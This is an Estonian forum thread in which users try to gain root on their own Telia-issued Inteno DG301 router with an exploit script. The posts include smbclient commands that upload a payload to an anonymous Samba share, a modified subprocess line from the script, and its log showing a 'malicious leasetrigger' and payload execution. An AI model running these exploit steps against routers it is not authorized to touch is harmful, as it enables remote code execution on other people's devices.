|
| seeru, koomik oled? Räägi siis lähemalt kuidas see välja näeb ja kust selle saab.
|
|
| Kommentaarid: 151 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
1 :: |
133 |
|
| tagasi üles |
|
 |
seeru
HV veteran
liitunud: 10.02.2004
|
03.04.2018 17:38:36
|
|
|
| KillFrenzy kirjutas: |
| seeru, koomik oled? Räägi siis lähemalt kuidas see välja näeb ja kust selle saab. |
Paistab, et sa ka koomik.
Sama protseduur nagu neonsea firmware peale lasid. Või siis ruuteri menüü kaudu.
|
|
| tagasi üles |
|
 |
ksuuk
Kreisi kasutaja
liitunud: 06.12.2007
|
03.04.2018 20:02:48
|
|
|
| Adebisi kirjutas: |
ksuuk, vaata kas niisama pääsed sambasharele ligi.
Kas siis failihaldurikaudu smb://192.168.1.1/pwned
või terminalis:
smbclient \\\\192.168.1.1\\pwnded
|
Kui sisse laseb siis saad selle faili üles laadida:
put /root/.payload.tmp pwn.sh
exit |
Kui sinna pwnded kausta õnnestub ligi saada ja faile tekitada siis võid selle scripti tekitatud faili käsitsi sinna kopeerida ja pwn.sh'ks ümber nimetada. Py koodist pead peale seda muidugi
| subprocess.run(r"smbclient \\\\%s\\pwned p -c 'put %s pwn.sh'" % (host, path), shell=True, check=True) |
selle eemaldama.
Mis ruuteritarkvara versioon muidu on? |
Ei saa:
root@debian:~# smbclient \\\\192.168.1.1\\pwnded
WARNING: The "syslog" option is deprecated
Enter root's password:
Firmware on latest - DG301-W7P2U_ELION3.11.6-170626_0111 Telia ei nõustu admin ligipääsu ka andma. Vaidlen nendega veel sel teemal, ruuter ju minu, koristagu enda soft sealt ära ja andku tunnused.
|
|
| Kommentaarid: 3 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
0 :: |
3 |
|
| tagasi üles |
|
 |
KillFrenzy
HV Guru

liitunud: 05.04.2003
|
03.04.2018 20:05:44
|
|
|
| ksuuk, nende softist saad ise ära koristada. Ainuke alternatiiv on eelnevalt lingitud fw.
|
|
| Kommentaarid: 151 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
1 :: |
133 |
|
| tagasi üles |
|
 |
Adebisi
Kreisi kasutaja
liitunud: 05.07.2003
|
03.04.2018 20:21:04
|
|
|
Versiooni järgi peaks nagu töötama.
Kui seal parooli küsimisele lihtsalt enterit vajutad ilma parooli trükkimata, mis väljundi siis annab?
| ksuuk kirjutas: |
Ei saa:
root@debian:~# smbclient \\\\192.168.1.1\\pwnded
WARNING: The "syslog" option is deprecated
Enter root's password:
Firmware on latest - DG301-W7P2U_ELION3.11.6-170626_0111 Telia ei nõustu admin ligipääsu ka andma. Vaidlen nendega veel sel teemal, ruuter ju minu, koristagu enda soft sealt ära ja andku tunnused. |
|
|
| Kommentaarid: 58 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
1 :: |
55 |
|
| tagasi üles |
|
 |
ksuuk
Kreisi kasutaja
liitunud: 06.12.2007
|
03.04.2018 21:09:56
|
|
|
| Adebisi kirjutas: |
Versiooni järgi peaks nagu töötama. :-?
Kui seal parooli küsimisele lihtsalt enterit vajutad ilma parooli trükkimata, mis väljundi siis annab?
|
Edit1: Enne pastesin vale tulemuse, kuna ei märganud, et Sul oli typo, mitte pwnded vaid pwned on õige path:
root@debian:~# smbclient \\\\192.168.1.1\\pwned
Enter root's password:
Anonymous login successful
Domain=[INTENOSMB] OS=[Unix] Server=[Samba 3.0.37]
smb: \> put /root/.payload.tmp pwn.sh
putting file /root/.payload.tmp as \pwn.sh (104.4 kb/s) (average 104.4 kb/s)
smb: \> exit
smbclient --version
Version 4.5.12-Debian
Edit2: muutsin seda rida:
#subprocess.run(r"smbclient \\\\%s\\pwned p -c 'put %s pwn.sh'" % (host, path),
subprocess.run(r"smbclient \\\\%s\\pwned -c 'put %s pwn.sh'" % (host, path),
Nüüd tekkis smbclient passwd prompt, enter sinna ja script vudis edasi:
Authenticating...
Got key: xxx
Adding Samba share...
Samba share seems to already exist, skipping
Enabling Samba...
Committing changes...
Setting malicious leasetrigger...
Committing changes...
Rebooting system...
Waiting on reboot...
Creating temp file for payload...
Dropping payload...
Enter root's password:
Anonymous login successful
Domain=[INTENOSMB] OS=[Unix] Server=[Samba 3.0.37]
putting file /root/.payload.tmp as \pwn.sh (15.8 kb/s) (average 15.8 kb/s)
Payload dropped
Authenticating...
Got key: xxx
Executing payload
Cleaning up...
Exploitation complete
Aga sisse ikka ei saa:
ssh root@192.168.1.1
Permission denied (publickey).
|
|
| Kommentaarid: 3 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
0 :: |
3 |
|
| tagasi üles |
|
 |
|